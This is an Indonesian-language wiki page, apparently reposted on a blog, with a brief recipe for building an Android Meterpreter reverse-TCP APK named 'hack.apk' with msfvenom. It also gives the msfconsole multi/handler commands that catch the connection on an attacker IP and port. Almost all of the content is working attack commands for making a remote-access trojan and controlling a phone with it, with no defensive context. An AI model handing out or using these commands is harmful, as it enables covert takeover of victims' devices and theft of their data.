Android/Meterpreter/reverse tcp APK dengan msfvenom

MSF: Android/Meterpreter/reverse tcp APK dengan msfvenom Jump to navigationJump to search sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/ Membuat apk dengan msfvenom msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk Asumsi IP attacker (kali linux) 192.168.0.209 port attacker 443 Di sisi attacker / kali linux msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.209 set lport 443 exploit Referensi • https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/ Navigation menu • Log in • Page • Discussion • Read • View source • View history Search • Main page • Recent changes • Random page • Help about MediaWiki Tools • What links here • Related changes • Special pages • Printable version • Permanent link • Page information • This page was last edited on 1 June 2017, at 05:50.

Comments

Popular posts from this blog

Cara Masuk Ke Bios Pengaturan BIOS Pada Pc Windows

Panduan Cara Install Windows 11 dengan Flashdisk (Lengkap untuk Pemula)

MSF: Checking for open Ports with Nmap